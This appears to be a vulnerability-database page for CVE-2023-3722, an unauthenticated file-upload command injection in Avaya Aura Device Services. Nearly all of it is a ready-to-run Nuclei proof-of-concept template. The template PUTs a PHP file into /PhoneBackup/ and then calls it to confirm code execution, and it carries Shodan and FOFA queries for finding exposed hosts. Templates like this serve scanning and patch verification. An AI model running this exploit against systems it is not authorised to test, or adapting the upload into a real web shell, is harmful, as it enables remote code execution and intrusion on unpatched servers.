CVE-2023-3722: Avaya Aura Device Services - OS Command Injection

日期: 2025-08-01 | 影响软件: Avaya Aura Device Services | POC: 已公开

漏洞描述

An OS command injection vulnerability was found in the Avaya Aura Device Services Web application which could allow remote code execution as the Web server user via a malicious uploaded file. This issue affects Avaya Aura Device Services version 8.1.4.0 and earlier.

PoC代码[已公开]

id: CVE-2023-3722

info:
  name: Avaya Aura Device Services - OS Command Injection
  author: iamnoooob,pdresearch
  severity: high
  description: |
    An OS command injection vulnerability was found in the Avaya Aura Device Services Web application which could allow remote code execution as the Web server user via a malicious uploaded file. This issue affects Avaya Aura Device Services version 8.1.4.0 and earlier.
  reference:
    - https://github.com/pizza-power/CVE-2023-3722
    - https://download.avaya.com/css/public/documents/101076366
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
    cvss-score: 8.6
    cve-id: CVE-2023-3722
    cwe-id: CWE-434
    epss-score: 0.46267
    epss-percentile: 0.97584
    cpe: cpe:2.3:a:avaya:aura_device_services:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: avaya
    product: aura_device_services
    shodan-query: html:"Avaya Aura® Utility Services"
    fofa-query: body="Avaya Aura® Utility Services"
  tags: cve,cve2023,avaya,rce,upload,deviceservices,intrusive

variables:
  filename: "{{randbase(8)}}"
  marker: "{{randstr}}"

http:
  - raw:
      - |
        PUT /PhoneBackup/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: AVAYA

        <?phP echo base64_decode($_GET['input']); ?>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 201'
          - 'contains(body, "Resource /PhoneBackup/{{filename}}.php has been created.")'
        condition: and
        internal: true

  - raw:
      - |
        GET /PhoneBackup/{{filename}}.php?input={{base64(marker)}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: AVAYA

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{marker}}")'
        condition: and
# digest: 4b0a00483046022100f7a62844bf31f1071f48d1ea92de9b2fd7a6f108b7a43ac694d236eeb9c25314022100cca63f136ff6f0047688dbde64d09545a0c0ab67a2d305e80c51422802846aa5:922c64590222798bb761d5b6d8e72950

相关漏洞推荐